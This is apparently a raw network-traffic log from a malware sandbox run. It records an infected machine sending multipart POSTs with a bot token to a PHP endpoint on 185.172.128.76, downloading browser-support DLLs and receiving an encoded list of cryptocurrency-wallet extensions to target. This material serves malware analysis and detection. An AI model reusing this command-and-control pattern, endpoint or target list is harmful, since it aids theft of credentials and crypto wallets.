Apr 25, 2024 12:16:11.311857939 CEST	1289	IN	Data Raw: 46 73 62 47 56 30 66 47 4a 6f 61 47 68 73 59 6d 56 77 5a 47 74 69 59 58 42 68 5a 47 70 6b 62 6d 35 76 61 6d 74 69 5a 32 6c 76 61 57 39 6b 59 6d 6c 6a 66 44 46 38 4d 48 77 77 66 45 4e 35 59 57 35 76 49 46 64 68 62 47 78 6c 64 48 78 6b 61 32 52 6c Data Ascii: FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWdhbmllYW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8M
Apr 25, 2024 12:16:11.311989069 CEST	1289	IN	Data Raw: 77 59 6d 64 6a 61 6d 56 77 62 6d 68 70 59 6d 78 68 61 57 4a 6a 62 6d 4e 73 5a 32 74 38 4d 58 77 77 66 44 42 38 52 6d 6c 75 62 6d 6c 6c 66 47 4e 71 62 57 74 75 5a 47 70 6f 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62 Data Ascii: wYmdjamVwbmhpYmxhaWJjbmNsZ2t8MXwwfDB8RmlubmllfGNqbWtuZGpobmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY2
Apr 25, 2024 12:16:11.312002897 CEST	456	IN	Data Raw: 59 6d 56 72 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 4e 68 5a 57 70 77 5a 6d 68 6d 5a 57 64 6c 61 32 52 6e 61 57 Data Ascii: YmVrY2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHx
Apr 25, 2024 12:16:11.333939075 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBGHJEBKJEGHJKECAAKJ Host: 185.172.128.76 Content-Length: 7631 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 12:16:11.334000111 CEST	7631	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 39 35 35 62 Data Ascii: ------DBGHJEBKJEGHJKECAAKJContent-Disposition: form-data; name="token"99955b647486d6fbdfc634912e98bc9cfe38290c8804c907fa2d7673d07aad082bec644b------DBGHJEBKJEGHJKECAAKJContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Apr 25, 2024 12:16:11.680521965 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 12:16:11.684705973 CEST	93	OUT	GET /15f649199f40275b/sqlite3.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 25, 2024 12:16:12.005330086 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:11 GMT Content-Type: application/x-msdos-program Content-Length: 1106998 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00 2e 00 00 00 14 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 35 37 00 00 00 00 00 5c 0b 00 00 00 c0 0e 00 00 0c 00 00 00 42 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 37 30 00 00 00 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70#N
Apr 25, 2024 12:16:12.005386114 CEST	1289	IN	Data Raw: 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 50 03 00 00 00 20 0f 00 00 04 00 00 00 8e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 Data Ascii: @B/81s:<R@B/92P @B
Apr 25, 2024 12:16:12.005424023 CEST	1289	IN	Data Raw: 00 00 00 e8 2b e9 0a 00 8d 43 ff 89 7c 24 08 89 5c 24 04 89 34 24 83 f8 01 77 8c e8 23 fd ff ff 83 ec 0c 85 c0 74 bf 89 7c 24 08 89 5c 24 04 89 34 24 e8 ac f6 0a 00 83 ec 0c 85 c0 89 c5 75 23 83 fb 01 75 a1 89 7c 24 08 c7 44 24 04 00 00 00 00 89 Data Ascii: +C\|$\$4$w#t\|$\$4$u#u\|$D$4$t&up\|$D$4$rZ\|$D$4$Q\|$D$4$*\|$D$4$s\|$D$4$
Apr 25, 2024 12:16:12.005461931 CEST	1289	IN	Data Raw: 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 03 8b 42 10 5d c3 55 31 c0 89 e5 8b 55 08 85 d2 74 11 8b 4a 10 85 c9 74 0a 8b 42 04 c6 04 08 00 8b 42 04 5d c3 8b 10 8d 4a 01 89 08 0f b6 12 81 fa bf 00 00 00 76 59 55 0f b6 92 40 9e ec 61 89 e5 53 8b 18 8a Data Ascii: ]U1UtB]U1UtJtBB]JvYU@aSuK?v"%=t=D[]USI1t9sAvuA@[] gatU$1U
Apr 25, 2024 12:16:12.005500078 CEST	1289	IN	Data Raw: 02 c1 e3 07 09 cb 89 1a e9 4c 01 00 00 0f b6 70 02 0f b6 db c1 e3 0e 09 f3 f6 c3 80 75 1e 83 e1 7f 81 e3 7f c0 1f 00 c7 42 04 00 00 00 00 c1 e1 07 b0 03 09 cb 89 1a e9 1d 01 00 00 0f b6 70 03 0f b6 c9 81 e3 7f c0 1f 00 c1 e1 0e 09 f1 f6 c1 80 75 Data Ascii: LpuBpuBxMMuMZ2Mx]uZxu
Apr 25, 2024 12:16:13.829456091 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDAKFCGIJKJKFHIDHIII Host: 185.172.128.76 Content-Length: 4599 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 12:16:14.171118975 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 12:16:14.326329947 CEST	202	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBGHJEBKJEGHJKECAAKJ Host: 185.172.128.76 Content-Length: 1451 Connection: Keep-Alive Cache-Control: no-cache
Apr 25, 2024 12:16:14.688968897 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 12:16:14.719647884 CEST	560	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIDHIEGIIIECAKEBFBAA Host: 185.172.128.76 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 39 35 35 62 36 34 37 34 38 36 64 36 66 62 64 66 63 36 33 34 39 31 32 65 39 38 62 63 39 63 66 65 33 38 32 39 30 63 38 38 30 34 63 39 30 37 66 61 32 64 37 36 37 33 64 30 37 61 61 64 30 38 32 62 65 63 36 34 34 62 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 48 49 45 47 49 49 49 45 43 41 4b 45 42 46 42 41 41 2d 2d 0d 0a Data Ascii: ------HIDHIEGIIIECAKEBFBAAContent-Disposition: form-data; name="token"99955b647486d6fbdfc634912e98bc9cfe38290c8804c907fa2d7673d07aad082bec644b------HIDHIEGIIIECAKEBFBAAContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------HIDHIEGIIIECAKEBFBAAContent-Disposition: form-data; name="file"------HIDHIEGIIIECAKEBFBAA--
Apr 25, 2024 12:16:15.054689884 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 12:16:15.940138102 CEST	560	OUT	POST /3cd2b41cbde8fc9c.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGHJKFHJJJKJJJJKEHCB Host: 185.172.128.76 Content-Length: 359 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 39 35 35 62 36 34 37 34 38 36 64 36 66 62 64 66 63 36 33 34 39 31 32 65 39 38 62 63 39 63 66 65 33 38 32 39 30 63 38 38 30 34 63 39 30 37 66 61 32 64 37 36 37 33 64 30 37 61 61 64 30 38 32 62 65 63 36 34 34 62 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 5a 58 49 30 61 44 52 6c 4f 48 49 30 4c 6d 5a 70 62 47 55 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 48 4a 4b 46 48 4a 4a 4a 4b 4a 4a 4a 4a 4b 45 48 43 42 2d 2d 0d 0a Data Ascii: ------EGHJKFHJJJKJJJJKEHCBContent-Disposition: form-data; name="token"99955b647486d6fbdfc634912e98bc9cfe38290c8804c907fa2d7673d07aad082bec644b------EGHJKFHJJJKJJJJKEHCBContent-Disposition: form-data; name="file_name"ZXI0aDRlOHI0LmZpbGU=------EGHJKFHJJJKJJJJKEHCBContent-Disposition: form-data; name="file"------EGHJKFHJJJKJJJJKEHCB--
Apr 25, 2024 12:16:16.295831919 CEST	170	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 0 Connection: keep-alive
Apr 25, 2024 12:16:16.988960981 CEST	93	OUT	GET /15f649199f40275b/freebl3.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 25, 2024 12:16:17.306396961 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:17 GMT Content-Type: application/x-msdos-program Content-Length: 685392 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Apr 25, 2024 12:16:18.516196966 CEST	93	OUT	GET /15f649199f40275b/mozglue.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 25, 2024 12:16:18.830398083 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:18 GMT Content-Type: application/x-msdos-program Content-Length: 608080 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Apr 25, 2024 12:16:19.237751961 CEST	94	OUT	GET /15f649199f40275b/msvcp140.dll HTTP/1.1 Host: 185.172.128.76 Cache-Control: no-cache
Apr 25, 2024 12:16:19.555145979 CEST	1289	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Apr 2024 10:16:19 GMT Content-Type: application/x-msdos-program Content-Length: 450024 Connection: keep-alive Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 